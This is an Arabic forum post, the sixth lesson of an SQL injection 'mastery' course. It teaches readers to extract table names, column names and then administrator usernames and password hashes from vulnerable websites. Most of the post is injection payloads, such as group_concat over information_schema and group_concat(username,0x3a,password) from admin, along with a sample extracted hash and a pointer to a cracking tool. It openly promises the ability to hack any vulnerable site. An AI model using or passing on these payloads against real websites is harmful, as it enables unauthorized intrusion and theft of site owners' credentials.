{الدرس السادس} استخراج الجداول والعواميد باستخدام ()group_concat واستخراج بيانات الادمن

{الدرس السادس} استخراج الجداول والعواميد باستخدام ()group_concat واستخراج بيانات الادمن

السلام عليكم ورحمة الله وركاته
============================
دورة احتراف
SQL Injection

مقدمة من قبل الهكر الجزائري
Mohamed10060

الدرس الثالث من الدورة
^_^

استخراج الجداول والعواميد باستخدام
()group_concat
واستخراج بيانات الادمن

===========================

اليوم درسنا مهم جدا
وهو استخراج كافة الجداول والعواميد الموجودة بقاعدة البيانات
واستخراج بيانات الادمن

نبدأ درسنا بعون الله

=================
اولاا: نقوم بفتح الموقع المصاب ثم نضع مكان العامود المصاب
كود:
group_concat(table_name)
وفي نهاية الرابط
كود:
+from+information_schema.tables+where+table_schema=database()--
بحيث يصبح الرابط كما بهذه الصورة
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
وبما ان الصورة مش كاملة دا الرابط كامل

كود:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

طيب الأن نفتح الرابط ونشوف اذا ظهرت الجداول

تمام ظهرت لنا جميع الجداول

ال يهمنا هو
جدول الـ
admin

لان هو بيحوي عامود اليوزر وعامود الباس مدير الموقع

طيب نحفظ اسم الجدول admin

والان نأتي الى استخارج العواميد

نقوم بتبديل بالرابط هو بتغير
كلمة

table_name

الى

column_name

والامر

information_schema.tables

الى

information_schema.columns

واذا ما عرفت تعدل اعمل مثل الي بالصورة

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]

طيب اكيد راح تسألوا ليش بدلنا كلمة
table
بكلمة
column

الجواب

عندما وضعنا كلمة table طلبنا استخراج الجداول وعندما وضعنا كلمة column طلبنا استخراج العواميد

طيب الان نفتح الرابط ونشوف العواميد

تمام ظهرت لنا العواميد

ال يهمني فيهم هو عامود
username
وعامود
password

وانتبهو ان بين كل عامود والأخر فاصلة
طيب الان عرفنا اسم جدول الباس واليوزر وهو admin وعرفنا اسماء عامود الباس وعامود اليوزر واليوزر
وهو username و password

طيب الان ايه بدنا نعمل

حنستخرج بيانات الادمن

الان نقوم بحذف
كود:
+information_schema.tables+where+table_schema=database()--

ونضع بدلها
admin
يعني بيصير الامر بنهاية الرابط هكذا
كود:
+from+admin--

ونقوم بتعديل
كود:
group_concat(column_name)

الى

كود:
group_concat(username,0x3a,password)

وهذه صورة توضح

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
بعد التعديل اضفنا الى نهاية الرابط
اسم جدول الادمن وكل واحد يغيره حسب اسم جدول الادمن الموجود بالموقع ال مستهدفه

وقمنا بتعديل

column_name

الى

username,0x3a,password

username:هذه يوجد به يوزر مدير الموقع
password:وهذا يوجد به باسوورد مدير الموقع
0x3a:وهذه تفصل بين اليوزر والباس

طيب الان نفتح الرابط بعد التعديل ونشوف بيانات الادمن

تمام ظهر لنا اليوزر والباس لمدير الموقع

fares
هذا اليوزر
b6c8248b03cb0d3b3f2bb1ac1da66f60

وهذ الباس

ولكنه مشفر للاسف
وهنالك طرق عديدة لفك التشفير
وايضا تستطيع فك التشفير عن طريق برنامج الهافيج

فاعلم اننا لن نستطيع دخول اللوحة ال لفك تشفيرة
وهنالك شروحات كثيرة لفك التشفير

واذا فهمتواهذا الدرس وفهمتوالدروس السابقة اعلموا ان باستطاعتكم اختراق اي موقع
مصاب ولكن قد تواجهكم بعض الحمايات ولن انهي الدورة ال بعداضافة كم درس اخر لتخطي الحمايات
وان شاء الله الى مركز معي انا متاكد انو راح يصير يخترق اي موقع مصاب

===========================

فهذه تكون نهاية الدرس السادس من الدورة ارجو ان يكون الدرس واضح ومفهوم ولي عندو اي استفسار يضعه في هذا الموضوع

الى اللقاء في درس اضافي للدورة

اخوكم في الله
Mohamed10060
.

» {الدرس الثالث} استخراج عدد الأعمدة باستخدام +order+by+
» {الدرس الرابع} استخراج العامود المصاب باستخدام +union+select+
» {الدرس الخامس} استخراج اصدار واسم ويوزر قاعدة البيانات
» {الدرس السابع} تخطي مشكلة عدم ظهور الخطأ عند استخراج عدد الأعمدة
» {الدرس التاسع}تخطي الــForbidden 403